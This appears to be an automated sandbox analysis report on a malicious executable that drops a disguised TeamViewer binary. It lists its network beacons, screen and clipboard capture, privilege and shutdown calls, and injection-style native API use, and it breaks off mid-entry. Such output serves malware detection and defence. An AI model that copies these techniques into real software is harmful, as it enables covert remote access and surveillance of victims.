Source: global traffic HTTP traffic detected: GET /dout.aspx?s=39260736&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=39260736&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=12652280&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.5:49752 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF66E0 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectA,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC, 3_2_6EAF66E0
Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard, 1_2_00405042
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF9BD0 GetCurrentThreadId,GetThreadDesktop,CreateDesktopA,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop, 3_2_6EAF9BD0

System Summary:

Uses 32bit PE files
Source: 77Etc0bR2v.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040323C EntryPoint,73D1E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 1_2_0040323C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_6EAF5B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 6_2_6EAF5B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 8_2_6EAF5B40
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00404853 1_2_00404853
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00406131 1_2_00406131
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_0053C2D6 6_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_004A13AA 6_2_004A13AA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_0053E430 6_2_0053E430
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_004C97CD 6_2_004C97CD
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_00534810 6_2_00534810
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_005438ED 6_2_005438ED
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_004AC8A9 6_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_00544B6A 6_2_00544B6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_004B9F5A 6_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_00546FFB 6_2_00546FFB
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_004A0FB2 6_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 19_3_026CB269 19_3_026CB269
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0040F6FE appears 64 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0053BCB5 appears 478 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0053E5C8 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0040DFA6 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 004A1B0C appears 248 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0053BCE8 appears 68 times
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF3610 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle, 3_2_6EAF3610
Contains functionality to call native functions
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint, 1_2_00401000
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 3_2_6EAFB0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache, 3_2_6EAF8400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAFB270 NtResumeThread,NtClose,HeapFree, 3_2_6EAFB270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAFADE0 NtProtectVirtualMemory, 3_2_6EAFADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAFB1F0 NtSuspendThread,NtClose, 3_2_6EAFB1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAFAFC0 NtGetContextThread,NtSetContextThread, 3_2_6EAFAFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FrostCrashedWindow,FrostCrashedWindow,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,InvertRect,InvertRect,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 3_2_6EAF8510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 3_2_6EAF14E0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle, 3_2_6EAF4EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache, 3_2_6EAFB2D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 3_2_6EAF2ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF18D0 NtProtectVirtualMemory, 3_2_6EAF18D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAFAE20 NtOpenThread, 3_2_6EAFAE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 3_2_6EAF1C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF2640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose, 3_2_6EAF2640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 3_2_6EAF23B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW, 3_2_6EAF7790
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 3_2_6EAF19F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAFAD39 NtProtectVirtualMemory, 3_2_6EAFAD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAFA500 NtQueryVirtualMemory, 3_2_6EAFA500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 3_2_6EAF2750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,InvertRect,InvertRect,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 3_2_6EAF6D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAFAFC0 NtGetContextThread,NtSetContextThread, 6_2_6EAFAFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAFADE0 NtProtectVirtualMemory, 6_2_6EAFADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 6_2_6EAF6D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW, 6_2_6EAF7790
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache, 6_2_6EAF8400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 6_2_6EAF8510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAFB270 NtResumeThread,NtClose,HeapFree, 6_2_6EAFB270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 6_2_6EAFB0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAFB1F0 NtSuspendThread,NtClose, 6_2_6EAFB1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,wsprintfA,CloseHandle,CloseHandle,CloseHandle, 6_2_6EAF4EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 6_2_6EAF2ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAFAE20 NtOpenThread, 6_2_6EAFAE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 6_2_6EAF1C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAFAD39 NtProtectVirtualMemory, 6_2_6EAFAD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF18D0 NtProtectVirtualMemory, 6_2_6EAF18D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 6_2_6EAF19F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF2640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose, 6_2_6EAF2640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 6_2_6EAF2750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 6_2_6EAF14E0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAFA500 NtQueryVirtualMemory, 6_2_6EAFA500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache, 6_2_6EAFB2D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 6_2_6EAF23B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,DestroyAcceleratorTable,GetProcessHeap,HeapAlloc,GetComputerNameExW,DestroyAcceleratorTable,DestroyAcceleratorTable,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,lstrcmp,lstrcmp,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,Get